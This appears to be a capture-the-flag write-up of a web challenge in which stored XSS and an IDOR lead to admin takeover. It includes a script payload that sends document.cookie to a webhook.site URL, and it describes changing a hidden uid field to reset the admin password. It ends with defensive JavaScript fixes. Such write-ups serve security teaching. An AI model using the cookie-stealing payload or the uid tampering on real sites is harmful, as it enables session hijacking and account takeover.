# 1️⃣ Web 300: Kryptos Support

<figure><img src="/files/TAzIz4KRyl94ucYWiKqr" alt=""><figcaption></figcaption></figure>

During my enumeration I found a form where you can submit content, and another page which is a login portal.

<figure><img src="/files/fcZVHHWTUMNHQD0Th8sX" alt=""><figcaption></figcaption></figure>

I submitted some test content and got this:

<figure><img src="/files/hYuDjG5jSe1NsOEutAaR" alt=""><figcaption></figcaption></figure>

The response above gave me a hint of a possible XSS attack, which could lead me to an admin's cookies/session. I sent a crafted XSS payload using <https://webhook.site>.

```
<script>
document.write('<img src="https://webhook.site/4805b428-e4e9-4754-9ff1-74f3b03e040d?c='+document.cookie+'" />');
</script>
```

Now I have the session cookies.

<figure><img src="/files/ane4WinIgzRk7sWZLQGM" alt=""><figcaption></figcaption></figure>

I installed a cookie editor to use the session that came from the results of my XSS attack.

<figure><img src="/files/fDe8C3GP9NiE5sYOEuop" alt=""><figcaption></figcaption></figure>

I was then redirected to the admin panel. I didn't find any input fields or file uploads, just the ticket that I submitted.

<figure><img src="/files/Evnguku3lUATRUYRJCEV" alt=""><figcaption></figcaption></figure>

Upon checking the links, I found a change password field. I tried to change the password of the current account; that's when I noticed that the account I compromised was a moderator.

<figure><img src="/files/aKhszfEbpehTwJNjYJtz" alt=""><figcaption></figcaption></figure>

So I thought that maybe there is an Admin account for this application. Next, I used the browser's inspect element function to check for hidden fields, and that's where I got the UID.

<figure><img src="/files/eRsz5sYvMf6Uumoot7L2" alt=""><figcaption></figcaption></figure>

I decided to edit the value to 1, supplied my chosen password and clicked submit, then I received the message below:

<figure><img src="/files/MXhXgrXYp1IVtnMP57cV" alt=""><figcaption></figcaption></figure>

I logged in using admin and my chosen password and was automatically redirected to the Home Page with a Flag.

<figure><img src="/files/mvT7sCSCUmqSJQLPoO0v" alt=""><figcaption></figcaption></figure>

Conclusion: **The application is vulnerable to Persistent XSS and IDOR, also known as Insecure Direct Object Reference.**
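How the two root causes from the conclusion would be closed on the server side, as an added example that is not the challenge's own code: the password-change handler takes the target account from the session instead of the hidden `uid` field, and ticket text is HTML-encoded when rendered. The in-memory user table, the moderator uid of 100 and all function names are constructed assumptions.

```javascript
// Added example: constructed in-memory data, hypothetical names throughout.
const users = new Map([
  [1, { name: "admin", role: "admin", password: "old-admin" }],
  [100, { name: "moderator", role: "moderator", password: "old-mod" }],
]);

// Vulnerable pattern from the write-up: the target account comes from a
// client-controlled hidden field, so any logged-in user can pick any uid.
function changePasswordVulnerable(db, session, body) {
  const target = db.get(Number(body.uid));
  if (!session || !target) return { status: 400 };
  target.password = body.password;
  return { status: 200, changed: target.name };
}

// Hardened: the target is always the authenticated session's own uid.
// A uid in the body that disagrees is rejected and can be logged as tampering.
function changePasswordHardened(db, session, body) {
  if (!session || !db.has(session.uid)) return { status: 401 };
  if (body.uid !== undefined && Number(body.uid) !== session.uid) {
    return { status: 403, reason: "uid does not match session" };
  }
  db.get(session.uid).password = body.password;
  return { status: 200, changed: db.get(session.uid).name };
}

// Stored-XSS fix: encode ticket text when it is written into the HTML page.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderTicket(message) {
  return `<li class="ticket">${escapeHtml(message)}</li>`;
}

// Session cookie attributes that keep the cookie out of document.cookie.
const SESSION_COOKIE_OPTIONS = { httpOnly: true, secure: true, sameSite: "Strict" };
```

Requiring the current password on a change request is a further check the hardened handler could add.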

